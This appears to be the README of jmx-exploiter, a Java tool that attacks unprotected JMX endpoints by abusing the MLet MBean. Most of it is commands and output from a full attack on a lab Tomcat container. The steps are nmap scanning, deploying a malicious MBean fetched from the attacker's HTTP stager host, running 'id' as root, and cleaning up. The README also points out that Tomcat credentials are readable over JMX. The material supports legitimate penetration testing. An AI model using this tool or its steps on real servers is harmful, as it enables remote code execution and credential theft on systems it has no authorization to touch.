
A tool that helps you attacking unprotected JMX endpoints

Primary LanguageJava


jmx-exploiter is a command line tool written in Java, that is designed to attack JMX endpoints. JMX stands for Java Management Extensions and can be used to monitor and configure the Java Virtual Machine from remote. Applications like tomcat or JBoss are often installed together with a JMX endpoint, which enables server administrators to monitor and manage the corresponding application.

JMX uses so called MBeans for monitoring and configuration tasks. The JMX Agent (sever, port) is basically just an interface, that handles remote connections and supports methods to communicate with the underlying MBean objects. The actual functionality is then implemented in the MBean itself and the JMX Agent only relays input and output to the MBean object.

By default, JMX endpoints support a MBean with name MLet. This MBean can be used to deploy new MBean objects on the JMX agent. The codebase for these new MBean objects can be gathered over the network e.g. in form of a HTTP request. Using the MLet feature, attackers with access to a JMX agent can easily deploy their own malicious MBean objects and compromise the underlying application server. jmx-exploiter can support you during this part and handle the MBean deployment and interaction for you.


jmx-exploiter is a Maven project. This makes the installation a straight forward process and no manual installation of libraries should be required. First of all, make sure that you have maven installed on your system:

sudo apt install maven      # Debian
pacman -s maven             # Arch

Then, clone the jmx-exploiter project in a location of your choice and run mvn package inside of the projects folder.

[pentester@kali opt]$ cd jmx-exploiter/
[pentester@kali jmx-exploiter]$ mvn package
[INFO] Scanning for projects...
[INFO] -----------------< de.qtc.JmxExploiter:jmx-exploiter >------------------
[INFO] Building jmx-exploiter 1.0.0
[INFO] --------------------------------[ jar ]---------------------------------

Since the main purpose of jmx-exploiter is the deployment of malicious MBean objects, you need also a corresponding MBean object. Theoretically you can deploy any MBean object that fulfills the MBean Specifications. However, this project does also provide a reference implementation, the tonka-bean. The tonka-bean is a seperate maven project and you can compile it in the same way as you compiled jmx-exploiter:

[pentester@kali jmx-exploiter]$ cd tonka-bean/
[pentester@kali tonka-bean]$ mvn package
[INFO] Scanning for projects...
[INFO] --------------------< de.qtc.TonkaBean:tonka-bean >---------------------
[INFO] Building tonka-bean 1.0.0
[INFO] --------------------------------[ jar ]---------------------------------

After maven has finished, you should find the executable .jar files in the target folders of the corresponding projects.

[pentester@kali opt]$ ls -l jmx-exploiter/target/jmx-exploiter.jar 
-rw-r--r-- 1 pentester pentester 64393 Nov  5 07:21 jmx-exploiter/target/jmx-exploiter.jar
[pentester@kali opt]$ ls -l jmx-exploiter/tonka-bean/target/tonka-bean.jar 
-rw-r--r-- 1 pentester pentester 2636 Nov  5 07:23 jmx-exploiter/tonka-bean/target/tonka-bean.jar


In this chapter I want to show you the basic usage of jmx-exploiter. For demonstration purposes, I created a vulnerable docker container, running an Apache Tomcat server with a JMX agent listening on port 9010. The corresponding docker-files can be found inside this repository and should enable you to practice the usage of jmx-exploiter yourself.

The listing below shows the nmap output for the corresponding container. Using the NSE-Script rmi-dumpregistry you can verify that port 9010 is running a JMX agent.

[pentester@kali opt]$ sudo nmap -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 07:24 CET
Nmap scan report for
Host is up (0.0000070s latency).
Not shown: 997 closed ports
8009/tcp open  ajp13    Apache Jserv (Protocol v1.3)
8080/tcp open  http     Apache Tomcat 9.0.2
9010/tcp open  java-rmi Java RMI
MAC Address: 02:42:AC:1E:00:02 (Unknown)

[pentester@kali opt]$ sudo nmap --script=rmi-dumpregistry  -p9010 -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 07:25 CET
Nmap scan report for
Host is up (0.000025s latency).

9010/tcp open  java-rmi Java RMI
| rmi-dumpregistry: 
|   jmxrmi
|      implements javax.management.remote.rmi.RMIServer, 

If you encounter a JMX endpoint during a pentest, you should first of all use jconsole to determine if you can connect to the JMX endpoint without valid credentials. Especially on Tomcat servers jconsole is interesting, since per default the credentials of Tomcat users are accessible over the JMX interface:

Tomcat Credentials

However, with jmx-exploiter your first step is to launch the status command on the remote JMX endpoint:

[pentester@kali target]$ ./jmx-exploiter.jar 9010 status
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+] Getting Status of MLet... done!
[+]	MLet is not registered on the JMX server.
[+] Getting Status of malicious Bean... done!
[+]	malicious Bean is not registered on the JMX server.

The status command tells you that neither MLet nor your malicious MBean are registered on the JMX endpoint. You could now either deploy them one by one by using the deployMLet and deployMBean commands, or you can simply use deployAll to deploy both in one step. But notice that for deploying the malicious MBean the remote server needs to establish a HTTP connection to your listener. Therefore, you might need a firewall whitelisting and you have to use the corresponding --stagerHost and --stagerPort options of jmx-exploiter, to specify where your listener can be found. You can also specify these options in a configuration file that looks like the one in the src folder of the project. The configuration file does also allow you to specify advanced options, like controlling the name of the deployed MBean. Lastly, make sure that the MBean you want to deploy can be found in the path that is specified in your configuration file (default is: tonka-bean/target/).

[pentester@kali deploy]$ ls
config.properties  jmx-exploiter.jar  tonka-bean
[pentester@kali deploy]$ cat config.properties 
[pentester@kali deploy]$ ./jmx-exploiter.jar -c config.properties 9010 deployAll
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+] Creating MBean 'MLet' for remote deploymet... done!
[+] Malicious Bean seems not to be registered on the server
[+] Starting registration process
[+] 	Creating HTTP server on
[+] 		Creating MLetHandler for endpoint /mlet... done!
[+] 		Creating JarHandler for endpoint /tonka-bean.jar... done!
[+]		Starting the HTTP server... done!
[+] 	Received request for /mlet
[+] 	Sending malicious mlet:
[+] 		Class:		de.qtc.tonkabean.TonkaBean
[+] 		Archive:	tonka-bean.jar
[+] 		Object:		MLetTonkaBean:name=TonkaBean,id=1
[+] 		Codebase:
[+] 	Received request for /tonka-bean.jar
[+] 	Sending malicious jar file... done!
[+] malicious Bean was successfully registered

The output suggests that the deployment worked like expected. You can verify this situation either by using the status command again, or by searching your MBean inside of jconsole:

[pentester@kali deploy]$ ./jmx-exploiter.jar 9010 status
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+] Getting Status of MLet... done!
[+]	MLet is registered on the JMX server.
[+] Getting Status of malicious Bean... done!
[+]	malicious Bean is registered on the JMX server.

Bean Deployed

If you deployed your own malicious MBean, you can now invoke your MBean methods directly from jconsole. While this is also possible for the tonka-bean, jmx-exploiter also supports options to interact with the tonka-bean from the command line:

[pentester@kali deploy]$ ./jmx-exploiter.jar 9010 execute --exec id 
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+] Sending command 'id' to the server... done!
[+] Servers answer is: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Once you are done with your MBean, you should make sure to undeploy all changes that you have made to the server. At least you should remove your malicious MBean from the server, but if MLet was not available when you started, you should also remove the MLet. jmx-exploiter makes the cleanup pretty easy, by just invoking:

[pentester@kali deploy]$ ./jmx-exploiter.jar -c config.properties 9010 undeployAll
[+] Connecting to JMX server... done!
[+] Creating MBeanServerConnection... done!
[+] Unregister malicious bean... done!
[+] Unregister MBean 'MLet'... done!

Now the JMX endpoint should be clean again and MLet and your malicous MBean should be removed.

Advanced Usage

In the previous chapter we already mentioned that jmx-exploiter can read options from a configuration file and from the command line. Options that would require long values, like the name of the MBean class or the corresponding object name can only be passed inside of the configuration file. The following snipped shows you the default configuration file that is used by jmx-exploiter internally:




In situations where the server cannot access your host because of restrictive firewall rules, you may be able to use the --remoteStager option to specify a remote stager host. If you have access to the remoteStager, you can also use jmx-exploiter from there by using the --stagerOnly option, which only spawns the HTTP listener. When using this option, no additional command line paramaters are required. However, you still need to specify the correct stager host, either by using command line options or a configuration file.

Why jmx-exploiter

The reader might argue that there are already many pre existing tools that support this kind of exploitation on JMX endpoints and that jmx-epxloiter seems to be a little bit superfluous. Well, while it is generally correct that there exist already many tools for this kind of exploitation (the most famous one is probably Metasploit), all these other tools are missing the flexibility that jmx-exploiter provides. The MBeans that are used by other tools are often just binary blobs that are designed to achieve one specific task, like a reverse shell. jmx-exploiter and the tonka-bean reference implementation of a malicious MBean enable you to create and deploy your own MBeans on the fly. Furthermore, the code of the tonka-bean is available in plain Java and compilation is done by your own. You can determine exactly what the MBean is doing and no surprising side effects can occur.

Finally, I did not find any tool that supports a cleanup operation after the exploitation is done. E.g. Metasploit leaves an ugly named MBean inside of the JMX interface, that can be accessed by anyone. This could be annoying for customers and is just bad practice. With the undeploy feature of jmx-exploiter you can restore the clean state of the JMX endpoint.


The initial idea and also the initial codebase of the tool were taken from this blogpost.